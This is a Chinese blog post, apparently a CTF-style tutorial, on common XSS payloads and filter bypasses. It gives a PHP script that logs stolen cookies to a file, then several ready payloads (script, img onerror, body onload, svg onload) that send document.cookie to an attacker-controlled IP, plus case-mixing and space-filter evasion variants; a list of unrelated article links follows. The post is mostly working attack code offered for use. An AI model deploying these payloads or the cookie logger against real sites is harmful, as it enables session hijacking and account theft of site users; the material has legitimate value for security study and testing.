当前位置: 首页 > news >正文

XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

http://www.mrgr.cn/news/68842.html

相关文章:

  • 【go从零单排】结构嵌套struct embedding
  • [JAVAEE] 面试题(四) - 多线程下使用ArrayList涉及到的线程安全问题及解决
  • HarmonyOS第一课——DevEco Studio的使用
  • Pytorch基本语法
  • Linux进程通信之管道
  • MinGW-w64_10.0.0 + GCC12_x86_64-12.2.0-release-posix-seh-msvcrt-rt_v10-rev2.zip
  • 双亲委派模型的破坏
  • JavaScript中异步函数的执行时机
  • Python 中使用组合方式构建复杂正则
  • Java 中如何巧妙应用 Function 让方法复用性更强
  • 三十五、Python基础语法(文件操作-下)
  • MIT 6.S081 Lab1: Xv6 and Unix utilities翻译
  • 关于向前欧拉法的一些总结
  • ARXML汽车可扩展标记性语言规范讲解
  • 单细胞 RNA 测序分析的当前最佳实践:教程-文献精读80
  • 【AI日记】24.11.08 Knowledge Graphs for RAG (知识图谱,Neo4j,Cypher)
  • C++builder中的人工智能(12):了解ELU(Exponential Linear Unit)——人工神经网络中的激活函数
  • 【Android】名不符实的Window类
  • AutoSar AP CM中的序列化总结
  • C++builder中的人工智能(10)神经网络中的Sigmoid函数
  • 苍穹外卖day09超出配送范围前端不提示问题
  • 367.有效地完全平方数
  • HCIP MPLS基础
  • 【JavaScript】网络请求之Promise fetch Axios及异步处理
  • YOLO11 旋转目标检测 | 数据标注 | 自定义数据集 | 模型训练 | 模型推理
  • 新一代AI换脸更自然,DeepLiveCam下载介绍(可直播)